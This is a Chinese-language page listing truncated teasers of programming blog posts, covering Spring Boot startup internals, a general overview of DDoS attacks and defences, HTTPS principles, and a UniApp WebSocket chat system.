羑悻的小杀马特.-CSDN博客羑悻的小杀马特.擅长C/C题海汇总,AI学习,c的不归之路,等方面的知识,羑悻的小杀马特.关注算法,c,c语言,青少年编程领域.https://blog.csdn.net/2401_82648291?typebbshttps://blog.csdn.net/2401_82648291?typebbshttps://blog.csdn.net/2401_8264829…...

编程日记 2025/2/3 9:04:03

springboot 启动原理

目标： SpringBootApplication注解认识了解SpringBoot的启动流程了解SpringFactoriesLoader对META-INF/spring.factories的反射加载认识AutoConfigurationImportSelector这个ImportSelector starter的认识和使用目录 SpringBoot 启动原理SpringBootApplication 注…...

编程日记 2025/2/3 8:59:57

浅析DDOS攻击及防御策略

DDoS（分布式拒绝服务）攻击是一种通过大量计算机或网络僵尸主机对目标服务器发起大量无效或高流量请求，耗尽其资源，从而导致服务中断的网络攻击方式。这种攻击方式利用了分布式系统的特性，使攻击规模更大、影响范围更广…...

编程日记 2025/2/3 8:54:52

Linux网络 HTTPS 协议原理

概念 HTTPS 也是一个应用层协议，不过是在 HTTP 协议的基础上引入了一个加密层。因为 HTTP的内容是明文传输的，明文数据会经过路由器、wifi 热点、通信服务运营商、代理服务器等多个物理节点，如果信息在传输过程中被劫持，传输的…...

编程日记 2025/2/3 8:53:50

基于uniapp+WebSocket实现聊天对话、消息监听、消息推送、聊天室等功能，多端兼容

基于 UniApp + WebSocket实现多端兼容的实时通讯系统，涵盖WebSocket连接建立、消息收发机制、多端兼容性配置、消息实时监听等功能，适配微信小程序、H5、Android、iOS等终端目录技术选型分析WebSocket协议优势UniApp跨平台特性WebSocket 基础实现连接管理消息收发连接…...

编程新知 2025/9/7 1:57:05